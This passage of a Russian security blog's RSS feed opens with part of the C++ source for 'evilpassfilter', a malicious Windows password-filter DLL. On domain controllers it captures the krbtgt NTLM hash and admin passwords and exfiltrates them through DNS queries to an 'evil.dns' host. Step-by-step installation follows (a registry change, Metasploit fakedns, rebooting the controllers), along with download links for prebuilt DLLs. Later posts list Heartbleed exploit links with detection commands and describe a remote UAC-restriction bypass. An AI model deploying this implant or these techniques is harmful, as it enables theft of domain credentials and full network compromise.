  &lt;span style='color:#808080; '&gt;//--- nslookup&lt;/span&gt;

  &lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt; buffUser[100];
  &lt;span style='color:#000084; font-weight:bold; '&gt;sprintf&lt;/span&gt;(buffUser, &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%ws&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;, UserName-&gt;Buffer);
  std::&lt;span style='color:#000084; font-weight:bold; '&gt;string&lt;/span&gt; strUser(buffUser);
  std::&lt;span style='color:#000084; font-weight:bold; '&gt;transform&lt;/span&gt;(strUser.begin(), strUser.end(), strUser.begin(), ::&lt;span style='color:#000084; font-weight:bold; '&gt;tolower&lt;/span&gt;);

  &lt;span style='color:#000084; font-weight:bold; '&gt;if&lt;/span&gt; (strUser.&lt;span style='color:#000084; font-weight:bold; '&gt;find&lt;/span&gt;(&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;krbtgt&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;)==0)
  {
 &lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt; hostname[255];
 NTLM(NewPassword-&gt;Buffer,(NewPassword-&gt;Length / 2));
 &lt;span style='color:#000084; font-weight:bold; '&gt;sprintf&lt;/span&gt;(hostname,&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%s&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;.krbtgt.evil.dns&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;,ntlmhash);
 nsping(hostname);
  }
  &lt;span style='color:#000084; font-weight:bold; '&gt;else&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;if&lt;/span&gt; (strUser.&lt;span style='color:#000084; font-weight:bold; '&gt;find&lt;/span&gt;(&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;admin&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;)!=-1 || strUser.&lt;span style='color:#000084; font-weight:bold; '&gt;find&lt;/span&gt;(&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;admn&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;)!=-1)
  {
    &lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt; hostname[255];
 std::&lt;span style='color:#000084; font-weight:bold; '&gt;string&lt;/span&gt; tmppw, tmpusr;
    tmppw.reserve( NewPassword-&gt;Length * 2 );
 tmpusr.reserve( UserName-&gt;Length * 2 );

 &lt;span style='color:#000084; font-weight:bold; '&gt;for&lt;/span&gt; (&lt;span style='color:#000084; font-weight:bold; '&gt;USHORT&lt;/span&gt; i = 0; i &amp;lt; (UserName-&gt;Length / 2); i++) 
 {
   &lt;span style='color:#000084; font-weight:bold; '&gt;sprintf&lt;/span&gt;((&lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt;*)tmpusr.c_str(), &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%s&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%x&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;-&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;,tmpusr.c_str(),UserName-&gt;Buffer[i]);
    }

 &lt;span style='color:#000084; font-weight:bold; '&gt;sprintf&lt;/span&gt;((&lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt;*)tmpusr.c_str(), &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%s&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;usr&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;,tmpusr.c_str());

 &lt;span style='color:#000084; font-weight:bold; '&gt;for&lt;/span&gt; (&lt;span style='color:#000084; font-weight:bold; '&gt;USHORT&lt;/span&gt; i = 0; i &amp;lt; (NewPassword-&gt;Length / 2); i++) 
 {
   &lt;span style='color:#000084; font-weight:bold; '&gt;sprintf&lt;/span&gt;((&lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt;*)tmppw.c_str(), &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%s&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%x&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;-&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;,tmppw.c_str(),NewPassword-&gt;Buffer[i]);
    }

 &lt;span style='color:#000084; font-weight:bold; '&gt;sprintf&lt;/span&gt;((&lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt;*)tmppw.c_str(), &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%s&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;pwd&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;,tmppw.c_str());

 &lt;span style='color:#000084; font-weight:bold; '&gt;string&lt;/span&gt; tmpbuffpw = tmppw.c_str();
 &lt;span style='color:#000084; font-weight:bold; '&gt;string&lt;/span&gt; tmpbuffusr = tmpusr.c_str();

 &lt;span style='color:#000084; font-weight:bold; '&gt;for&lt;/span&gt; (&lt;span style='color:#000084; font-weight:bold; '&gt;USHORT&lt;/span&gt; i = 0; i &amp;lt; tmpbuffpw.length(); i=i+63) 
 {
   &lt;span style='color:#000084; font-weight:bold; '&gt;sprintf&lt;/span&gt;(hostname,&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%s&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;.&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%s&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;.evil.dns&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;,(tmpbuffpw.substr ( i , 63 )).c_str(),(tmpbuffusr.substr ( 0 , 63 )).c_str());
   nsping(hostname);
 }

  }

  &lt;span style='color:#808080; '&gt;//---&lt;/span&gt;

  &lt;span style='color:#000084; font-weight:bold; '&gt;return&lt;/span&gt; 0;
}
&lt;/pre&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style="text-align: justify;"&gt;Инсталляция:&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;1. На всех контроллерах домена (вне зависимости от их роли!) прописаться в качестве password-фильтра&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;reg query HKLM\System\CurrentсontrolSet\Control\Lsa /v "Notification Packages"&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;reg add HKLM\System\CurrentcontrolSet\Control\Lsa /v "Notification Packages" /t REG_MULTI_SZ /d scecli\0RASSFM\0evilpassfilter&amp;nbsp;/f&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;2. Зарегистрировать dns-имя и на ns-сервере поднять, например, &lt;a href="http://www.rapid7.com/db/modules/auxiliary/server/fakedns" target="_blank"&gt;msf fakedns&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;msf &amp;gt; use auxiliary/server/fakedns&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;msf auxiliary(fakedns) &amp;gt; run&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;3. Сребутать все котроллеры домена 8)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;ЗЫ. &lt;a href="http://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/" target="_blank"&gt;clymb3r&lt;/a&gt; в свое время сумел подгрузить password-фильтр без ребута системы, однако у мну эта магия не взлетела(( стукнитесь, если у кого получится.&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYPdllLqPlBYD9Z8C1Q4VK1fg2v7dJuhA9lfUUgvuRpLDCmt4jC__4YbFKFNIcdBDe5yGgybFkr2L8zsY2YFL4rzz0FiddsctbQQOkiOyaLOIdEsM6WZBPZ7bSyqMifhJ_8lgTTqw9L-8/s1600/evilpassfilter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYPdllLqPlBYD9Z8C1Q4VK1fg2v7dJuhA9lfUUgvuRpLDCmt4jC__4YbFKFNIcdBDe5yGgybFkr2L8zsY2YFL4rzz0FiddsctbQQOkiOyaLOIdEsM6WZBPZ7bSyqMifhJ_8lgTTqw9L-8/s1600/evilpassfilter.png" height="360" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Y-YqcQy_FKnEnC1AUf-OjedZkBwuL-goiGNFhcxTiptYljsfB865z2hYp1g3ITqhFyi5HIUcjoYxnxJzFSw8LqFyMQxwOrNRDa9k19QF2HWj_6jp6xHrzusD5WHDEPZq7yCGlTThFe0/s1600/krbtgt-nthash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Y-YqcQy_FKnEnC1AUf-OjedZkBwuL-goiGNFhcxTiptYljsfB865z2hYp1g3ITqhFyi5HIUcjoYxnxJzFSw8LqFyMQxwOrNRDa9k19QF2HWj_6jp6xHrzusD5WHDEPZq7yCGlTThFe0/s1600/krbtgt-nthash.png" width="580" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Для экспериментов можно использовать следующие сборки [&lt;a href="https://drive.google.com/file/d/0Bwv6HYj6-f9tR2pmZDBGZlV6eXM" target="_blank"&gt;evilpassfilter.dll,&lt;/a&gt; &lt;a href="https://drive.google.com/file/d/0Bwv6HYj6-f9tS1h2MDNPbWt1TjA"&gt;evilpassfilter_x64.dll&lt;/a&gt;]. Данные билды никуда не пересылают пароли, а только лишь аккуратно складывают их в файлик c:\windows\temp\pw.tmp&lt;br /&gt;
&lt;br /&gt;
&lt;div class="p1"&gt;MD5 (evilpassfilter.dll) = d9d210c382155a9f50e051a1a3a9d5a6&lt;/div&gt;&lt;div class="p1"&gt;&lt;/div&gt;&lt;div class="p1"&gt;MD5 (evilpassfilter_x64.dll) = ac53dc59933d0ce6ef6058fc1340caef&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy5CqiDa4fcH5WijcZISwYpFu_7zsL9CezbsDVZiUeRbWygdQIOd7WMcvrsye8oMOtaIf7hmB0hXv7K-1MPhrFr9XYLhc-aUBlKTrZuJ5k4IEOK-Y5riL9tQRxEpyyOo8tehrTeY2VyOo/s72-c/image47%5B1%5D.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><item><title>CVE-2014-0160 Рабочий сплоит</title><link>http://devteev.blogspot.com/2014/04/cve-2014-0160.html</link><category>0day</category><category>exploits</category><category>open source</category><category>openssl</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 8 Apr 2014 19:22:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-7673037047561992769</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div&gt;
Этот эксплоит сделал мой день 8))&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;a href="https://gist.github.com/andresriancho/10135096" style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, helvetica, arial, sans-serif;"&gt;https://gist.github.com/andresriancho/10135096&lt;/a&gt;&lt;br&gt;
&lt;a href="https://bitbucket.org/johannestaas/heartattack/src"&gt;https://bitbucket.org/johannestaas/heartattack/src&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Полезный патч на сплоит от &lt;a href="https://twitter.com/d0znpp" target="_blank"&gt;d0znpp&lt;/a&gt;:&amp;nbsp;&lt;a href="http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html"&gt;http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
+1&amp;nbsp;Heartbleed User Session Extraction:&amp;nbsp;&lt;a href="http://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html"&gt;http://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html&lt;/a&gt;&lt;br&gt;
&lt;complete id="goog_28405665"&gt;+1&amp;nbsp;HackerFantastic:&amp;nbsp;&lt;a href="https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c"&gt;https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c&lt;/a&gt;&lt;/complete&gt;&lt;br&gt;
+1&amp;nbsp;&lt;a href="http://didierstevens.com/files/data/heartbleed_packet_capture.zip"&gt;http://didierstevens.com/files/data/heartbleed_packet_capture.zip&lt;/a&gt;&lt;/div&gt;&lt;div&gt;+1&amp;nbsp;&lt;a href="http://foxitsecurity.files.wordpress.com/2014/04/fox_heartbleedtest.zip" style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, helvetica, arial, sans-serif;"&gt;http://foxitsecurity.files.wordpress.com/2014/04/fox_heartbleedtest.zip&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;
NMAP NSE:&amp;nbsp;&lt;a href="http://seclists.org/nmap-dev/2014/q2/att-27/ssl-heartbleed.nse"&gt;http://seclists.org/nmap-dev/2014/q2/att-27/ssl-heartbleed.nse&lt;/a&gt;&lt;br&gt;
MSF:&amp;nbsp;&lt;a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb"&gt;https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;b&gt;Чекалка уязвимости (online):&amp;nbsp;&lt;/b&gt;&lt;br&gt;
&lt;b&gt;&lt;a href="http://filippo.io/Heartbleed/"&gt;http://filippo.io/Heartbleed/&lt;/a&gt;&amp;nbsp;ИЛИ&amp;nbsp;&lt;a href="http://possible.lv/tools/hb/"&gt;http://possible.lv/tools/hb/&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
Более продвинутая чекалка (SSL в целом и&amp;nbsp;&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160" target="_blank"&gt;CVE-2014-0160&lt;/a&gt; в частности) от&amp;nbsp;&lt;a href="http://www.qualys.com/" target="_blank"&gt;Qualys&lt;/a&gt;:&amp;nbsp;&lt;a href="https://www.ssllabs.com/ssltest/"&gt;https://www.ssllabs.com/ssltest/&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmhYrA3splaswAOah0FzrLbIWdsTayhqWJNp0YfMiGwH6Hx9H29f9mpGhte7K7KlY9A2U1ns77qqzcmjrJPqd0-YlE3llEc3NPa9oNMbppN_AZb98V6uJN7ifi-7r1arAjtsX0CzkWt8/s640/blogger-image-381625806.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmhYrA3splaswAOah0FzrLbIWdsTayhqWJNp0YfMiGwH6Hx9H29f9mpGhte7K7KlY9A2U1ns77qqzcmjrJPqd0-YlE3llEc3NPa9oNMbppN_AZb98V6uJN7ifi-7r1arAjtsX0CzkWt8/s400/blogger-image-381625806.jpg" width="500"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX5Bo2GsuaMpZYUQIx_lqQc79SmhZl_4Iyx0yk6ghItfsL9oBWOIJ1rUQU_jUyGdvChj87bfjchPbXs4bK337nZEwURD3rVijbypzoy2U8JMwtnLOO7wcAXq-XegWv4ORkx9W6YJaBokE/s1600/BktPEYBCAAABCDW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX5Bo2GsuaMpZYUQIx_lqQc79SmhZl_4Iyx0yk6ghItfsL9oBWOIJ1rUQU_jUyGdvChj87bfjchPbXs4bK337nZEwURD3rVijbypzoy2U8JMwtnLOO7wcAXq-XegWv4ORkx9W6YJaBokE/s1600/BktPEYBCAAABCDW.png" height="468" width="500"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br&gt;
Heartbleed Honeypot Script:&amp;nbsp;&lt;a href="http://packetstormsecurity.com/files/126068"&gt;http://packetstormsecurity.com/files/126068&lt;/a&gt;&lt;br&gt;
Detect heartbleed attacks with tshark [&lt;a href="https://twitter.com/Miguel_Arroyo76/status/453540912728408064" target="_blank"&gt;1&lt;/a&gt;]: tshark -i eth0 -R "ssl.record.content_type eq 24 and not ssl.heartbeat_message.type"&lt;br&gt;
&lt;br&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6_cY4xM1uX_m9dabI6aAF365P1Bpm3IuLttbe0pt6TMCpz_-71oKER_0aiYjX0LtXSsG28vZbxBwcWY7OCpARCTwrVRNzQvHUSmwMh_7iWXB-hzJinmbHRcXKs4Tjv5u5nHI9_HdXokE/s1600/BkwVMIoCAAA814Y.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6_cY4xM1uX_m9dabI6aAF365P1Bpm3IuLttbe0pt6TMCpz_-71oKER_0aiYjX0LtXSsG28vZbxBwcWY7OCpARCTwrVRNzQvHUSmwMh_7iWXB-hzJinmbHRcXKs4Tjv5u5nHI9_HdXokE/s1600/BkwVMIoCAAA814Y.png" height="475" width="500"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br&gt;
Search for processes still using old OpenSSL #heartbleed : grep -l 'libssl.*deleted' /proc/*/maps | tr -cd 0-9\\n | xargs -r ps u&lt;br&gt;
&lt;br&gt;
Ссылки:&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://www.techworm.net/2014/04/zero-day-open-ssl-vulnerability.html"&gt;http://www.techworm.net/2014/04/zero-day-open-ssl-vulnerability.html&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://www.xakep.ru/post/62329"&gt;http://www.xakep.ru/post/62329&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://habrahabr.ru/post/218609/"&gt;http://habrahabr.ru/post/218609/&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://www.us-cert.gov/ncas/alerts/TA14-098A?utm_source=twitterfeed&amp;amp;utm_medium=twitter"&gt;http://www.us-cert.gov/ncas/alerts/TA14-098A&lt;/a&gt;&lt;br&gt;
&lt;a href="https://github.com/musalbas/heartbleed-masstest/blob/master/top10000.txt"&gt;https://github.com/musalbas/heartbleed-masstest/blob/master/top10000.txt&lt;/a&gt;&lt;br&gt;
&lt;a href="http://blogs.cisco.com/security/openssl-heartbleed-vulnerability-cve-2014-0160-cisco-products-and-mitigations/"&gt;http://blogs.cisco.com/security/openssl-heartbleed-vulnerability-cve-2014-0160-cisco-products-and-mitigations/&lt;/a&gt;&lt;br&gt;
&lt;a href="https://community.qualys.com/blogs/qualys-tech/2014/04/09/heartbleed-detection-update"&gt;https://community.qualys.com/blogs/qualys-tech/2014/04/09/heartbleed-detection-update&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQmhYrA3splaswAOah0FzrLbIWdsTayhqWJNp0YfMiGwH6Hx9H29f9mpGhte7K7KlY9A2U1ns77qqzcmjrJPqd0-YlE3llEc3NPa9oNMbppN_AZb98V6uJN7ifi-7r1arAjtsX0CzkWt8/s72-c/blogger-image-381625806.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="8177" type="application/zip" url="http://didierstevens.com/files/data/heartbleed_packet_capture.zip"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>Этот эксплоит сделал мой день 8))&amp;nbsp; https://gist.github.com/andresriancho/10135096 https://bitbucket.org/johannestaas/heartattack/src Полезный патч на сплоит от d0znpp:&amp;nbsp;http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html +1&amp;nbsp;Heartbleed User Session Extraction:&amp;nbsp;http://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html +1&amp;nbsp;HackerFantastic:&amp;nbsp;https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c +1&amp;nbsp;http://didierstevens.com/files/data/heartbleed_packet_capture.zip+1&amp;nbsp;http://foxitsecurity.files.wordpress.com/2014/04/fox_heartbleedtest.zip NMAP NSE:&amp;nbsp;http://seclists.org/nmap-dev/2014/q2/att-27/ssl-heartbleed.nse MSF:&amp;nbsp;https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb Чекалка уязвимости (online):&amp;nbsp; http://filippo.io/Heartbleed/&amp;nbsp;ИЛИ&amp;nbsp;http://possible.lv/tools/hb/ Более продвинутая чекалка (SSL в целом и&amp;nbsp;CVE-2014-0160 в частности) от&amp;nbsp;Qualys:&amp;nbsp;https://www.ssllabs.com/ssltest/ Heartbleed Honeypot Script:&amp;nbsp;http://packetstormsecurity.com/files/126068 Detect heartbleed attacks with tshark [1]: tshark -i eth0 -R "ssl.record.content_type eq 24 and not ssl.heartbeat_message.type" Search for processes still using old OpenSSL #heartbleed : grep -l 'libssl.*deleted' /proc/*/maps | tr -cd 0-9\\n | xargs -r ps u Ссылки: http://www.techworm.net/2014/04/zero-day-open-ssl-vulnerability.html http://www.xakep.ru/post/62329 http://habrahabr.ru/post/218609/ http://www.us-cert.gov/ncas/alerts/TA14-098A https://github.com/musalbas/heartbleed-masstest/blob/master/top10000.txt http://blogs.cisco.com/security/openssl-heartbleed-vulnerability-cve-2014-0160-cisco-products-and-mitigations/ https://community.qualys.com/blogs/qualys-tech/2014/04/09/heartbleed-detection-update</itunes:subtitle><itunes:author>noreply@blogger.com (Dmitry Evteev)</itunes:author><itunes:summary>Этот эксплоит сделал мой день 8))&amp;nbsp; https://gist.github.com/andresriancho/10135096 https://bitbucket.org/johannestaas/heartattack/src Полезный патч на сплоит от d0znpp:&amp;nbsp;http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html +1&amp;nbsp;Heartbleed User Session Extraction:&amp;nbsp;http://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html +1&amp;nbsp;HackerFantastic:&amp;nbsp;https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c +1&amp;nbsp;http://didierstevens.com/files/data/heartbleed_packet_capture.zip+1&amp;nbsp;http://foxitsecurity.files.wordpress.com/2014/04/fox_heartbleedtest.zip NMAP NSE:&amp;nbsp;http://seclists.org/nmap-dev/2014/q2/att-27/ssl-heartbleed.nse MSF:&amp;nbsp;https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb Чекалка уязвимости (online):&amp;nbsp; http://filippo.io/Heartbleed/&amp;nbsp;ИЛИ&amp;nbsp;http://possible.lv/tools/hb/ Более продвинутая чекалка (SSL в целом и&amp;nbsp;CVE-2014-0160 в частности) от&amp;nbsp;Qualys:&amp;nbsp;https://www.ssllabs.com/ssltest/ Heartbleed Honeypot Script:&amp;nbsp;http://packetstormsecurity.com/files/126068 Detect heartbleed attacks with tshark [1]: tshark -i eth0 -R "ssl.record.content_type eq 24 and not ssl.heartbeat_message.type" Search for processes still using old OpenSSL #heartbleed : grep -l 'libssl.*deleted' /proc/*/maps | tr -cd 0-9\\n | xargs -r ps u Ссылки: http://www.techworm.net/2014/04/zero-day-open-ssl-vulnerability.html http://www.xakep.ru/post/62329 http://habrahabr.ru/post/218609/ http://www.us-cert.gov/ncas/alerts/TA14-098A https://github.com/musalbas/heartbleed-masstest/blob/master/top10000.txt http://blogs.cisco.com/security/openssl-heartbleed-vulnerability-cve-2014-0160-cisco-products-and-mitigations/ https://community.qualys.com/blogs/qualys-tech/2014/04/09/heartbleed-detection-update</itunes:summary><itunes:keywords>0day, exploits, open source, openssl</itunes:keywords></item><item><title>[hacking tricks] LocalAccountTokenFilterPolicy bypass</title><link>http://devteev.blogspot.com/2014/03/hacking-tricks-localaccounttokenfilterp.html</link><category>exploits</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 31 Mar 2014 02:13:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-51085905729742246</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Скверный для хакера параметр безопасности винды LocalAccountTokenFilterPolicy, появившийся со времен Windows Vista, отвечает за функциклирование&amp;nbsp;&lt;a href="http://support.microsoft.com/kb/951016/ru" target="_blank"&gt;удаленного ограничения UAC&lt;/a&gt;. &amp;nbsp;Это такая штука, которая фильтрует наличие привилегий админстратора по сети в отношении всех локальных пользователей системы, которые входят в группу "Администраторы". То есть, все локальные администраторы, кроме дефолтового админа с SID 500, не смогут воспользоваться интерфейсами удаленного администрирования (SMB, RPC, ...) до тех пор пока данный механизм безопасности включен. Но я кажется нашел алгоритм обхода и он основан не на подключении по RDP :)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Предлагаемый способ основан на том, что в конфигурациях по умолчанию современных Windows систем для конечных пользователей хитрым образом &lt;a href="http://technet.microsoft.com/en-us/library/ff660257(v=ws.10).aspx" target="_blank"&gt;шарится папочка "C:\Users"&lt;/a&gt;, содержащая профили пользователей. Я думаю, что уже после этой фразы стал очевиден сценарий атаки при наличии идентификатора и пароля пользователя, которого удаленная система не желает воспринимать в качестве администратора. Значит экзекнуться в подобной ситуации уже реально, остается лишь разобраться с локальным UAC, чтобы стать полноценным администратором системы.&lt;br /&gt;
&lt;br /&gt;
Для обхода локальных ограничений безопасности UAC можно воспользоваться наработками&amp;nbsp;&lt;a href="http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" target="_blank"&gt;Leo Davidson&lt;/a&gt;, которые затем переконтовали в удобную консольную тулу [&lt;a href="https://www.trustedsec.com/downloads/tools-download/" target="_blank"&gt;забрать&lt;/a&gt;]. Стоит лишь добавить, что метод обхода локального UAC работает также и на Windows 8 со всеми обновлениями безопасности на сегодняшний день.&lt;/div&gt;&lt;style&gt;
/* http://cssdeck.com/labs/pure-css-osx-terminal */
body { background:#d2dfe6;
color: #444;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
line-height: 1.5em;
}

/* FINDER WINDOW */

#window{
    width: 90%;
    margin-top:40px;
 margin-left: auto;
 margin-right: auto;
    margin-bottom:40px;
    min-width: 500px; 
    background: #fff;
    border-radius: 5px;
    -webkit-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    -moz-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    /*-webkit-transition:all 0.5s; */
    overflow: hidden; 
}

/* TOP BAR */
#topbar{
    width: 100%;
    height: 21px;
    font-size: 16px;
    font-family: "Myriad Pro", sans-serif;
    text-shadow:0px 1px 0px rgba(255,255,255,0.25);
    -webkit-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
    -moz-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
   
    
}
#topbar ul li {
    float: left; 
    padding:0 10px;
    height: 21px;
    line-height: 24px;
}
#topbar ul li:first-child{
    font-size: 20px;
    line-height: 26px;
    margin-left: 5px;
}
#topbar ul li:nth-child(2){
    font-family: "Myriad-Semi", sans-serif;
}
#topbar ul li:active{
